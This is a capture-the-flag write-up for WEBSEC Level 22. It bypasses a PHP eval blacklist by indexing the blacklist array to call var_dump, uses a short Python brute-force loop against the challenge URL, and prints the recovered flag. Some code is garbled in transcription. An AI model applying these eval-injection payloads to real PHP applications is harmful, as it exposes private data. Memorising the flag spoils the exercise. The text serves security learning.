WEBSEC Level 22

Challenge description

This is level to reflect on.

Initial analysis

php class A { public $pub; protected $pro ; private $pri; function __construct($pub, $pro, $pri) { $this->pub = pub; this->pro = pro; this->pri = $pri; } }

include 'file_containing_the_flag_parts.php'; a = newA(f1, f2, f3) //object created ... blacklist = arraymerge(funcs_internal, funcsextra, funny_chars, variables); //arraywiththepotential//functiontodumbobjecta ... if ($insecure) { echo 'Insecure code detected!'; } else { eval ("echo $code;"); } ?>

Walk through

STEP 1: Call the blacklistarraywithsince[]isblocked.Payload : blacklist{1} OUTPUT: func_get_arg

STEP 2: Give the function of the i'th index of blacklistarrayasa Payload: blacklist1(a) OUTPUT: func_get_arg($a)

STEP 3: Find the index in $blacklist array which is var_dump

from requests import * import sys url = 'http://websec.fr/level22/index.php' i = 0 while True: params = {'code': '$blacklist{{{0}}}'.format(i)} r = get(url, params=params) if r.text.find('var_dump') > -1: print str(i) sys.exit(0) else: i=i+1

OUTPUT: 579

STEP 4: blacklist579(a) OUTPUT: object(A)#1 (3) { ["pub"]=> string(17) "WEBSEC{But_I_was_" ["pro":protected]=> string(18) "told_that_OOP_was_" ["pri":"A":private]=> string(22) "flawless_and_stuff_:<}" }

Flag

FLAG: WEBSEC{But_I_was_told_that_OOP_was_flawless_and_stuff_:<}

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.